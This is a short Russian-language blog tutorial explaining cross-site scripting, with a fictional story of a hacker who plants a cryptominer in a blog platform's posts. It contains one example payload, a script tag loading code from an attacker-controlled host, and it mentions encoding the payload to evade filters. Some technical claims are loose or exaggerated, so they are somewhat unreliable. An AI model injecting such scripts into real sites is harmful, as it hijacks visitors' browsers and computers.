Привет хакерам! На связи Ugnikinn, сегодня расскажу вам что такое XSS и как его используют. Погнали!
Что такое XSS?
XSS (Межсайтовый скриптинг, Cross-Site Scripting) это внедрение HTML/CSS/JavaScript кода в базу данных сайта для его будущего исполнения браузером при загрузке одной из страниц сайта. То есть браузер при загрузке заражённой страницы выполнит внедрённый в эту страницу вредоносный код.
Происходит это обычно следующим образом - хакер ищет на сайте форму, данные из которой будут в дальнейшем отображаться на одной из страниц. Это может быть любое поле ввода на сайте, результаты которого будут видеть другие люди - форма авторизации, поле создания поста на блог площадке и т. д. В форму хакер помимо обычного текста, который туда нужно ввести, вводит код, исполняемый браузером при его обычном отображении. Код может быть любым - от рекламы и JS-майнеров до опасных вирусов, которые могут вырваться за рамки браузера или жучок, способный даже получить доступ к базе данных сайта, если он сохранится там.
Обычно для того чтобы можно было в любой момент изменить содержимое заражённой страницы, используют JavaScript, подгружающийся с страницы, доступ к которой имеет хакер. Делается это с помощью <script src="[путь к коду JavaScript]"></script>. Обычно сайты блокируют спецсимволы в формах для того чтобы защититься от атак, но хакеры шифруют этот код так, что его не сможет распознать защита, но он тем не менее исполняется в браузере.
Возьмём для примера вымышленную блог платформу Blogex. Это площадка где люди могут вести свой блог и т. п. Однажды хакер под ником CrazyMad_ решил заработать на этом сайте. По-быстрому написал JS-майнер и решил действовать. Он купил популярный аккаунт в Blogex, повыкладывал посты недельку и потом решил выложить заражённый пост. Он залил свой код с майнером на хостинг и потом написал пост, но в конце поста добавил код <script src="https://crazymad_js.superhosting.su/blogex_miner/"></script>, за предварительно превратив его в ASCII-код. Затем CrazyMad_ опубликовал пост, и всё!. Теперь как только он попадёт в ленту к его подписчикам, на их компьютере запустится майнер и займёт всю оперативную память и компьютер зависнет. Единственный способ прекратить этот ад - перезагрузить компьютер. И каждый раз, когда браузер будет загружать заражённый пост, компьютер будет превращаться в личный майнер CrazyMad_, пока его не перезагрузят.
На этом всё! В следующей статье я покажу как применять XSS на практике.